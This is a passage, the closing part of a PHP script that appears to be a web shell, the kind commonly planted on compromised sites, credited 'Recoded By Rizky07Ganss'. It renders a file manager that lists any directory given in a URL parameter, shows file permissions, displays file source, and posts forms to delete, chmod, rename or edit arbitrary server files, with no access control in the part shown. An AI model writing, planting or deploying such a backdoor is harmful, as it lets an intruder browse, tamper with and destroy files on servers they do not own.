<tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr>';
foreach($scandir as $dir){
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
echo "<tr>
<td><a href=\"?path=$path/$dir\">$dir</a></td>
<td><center>--</center></td>
<td><center>";
if(is_writable("$path/$dir")) echo '<font color="Blue">';
elseif(!is_readable("$path/$dir")) echo '<font color="red">';
echo perms("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input type=\"submit\" value=\"Oke\" />
</form></center></td>
</tr>";
}
echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
foreach($scandir as $file){
if(!is_file("$path/$file")) continue;
$size = filesize("$path/$file")/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
}
echo "<tr>
<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>".$size."</center></td>
<td><center>";
if(is_writable("$path/$file")) echo '<font color="Blue">';
elseif(!is_readable("$path/$file")) echo '<font color="red">';
echo perms("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
<option value=\"edit\">Edit</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input type=\"submit\" value=\"Oke\" />
</form></center></td>
</tr>";
}
echo '</table>
</div>';
}
echo '<center><br/><font color=red face=opal>Recoded By Rizky07Ganss</font><center>
</BODY>
</HTML>';
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
?>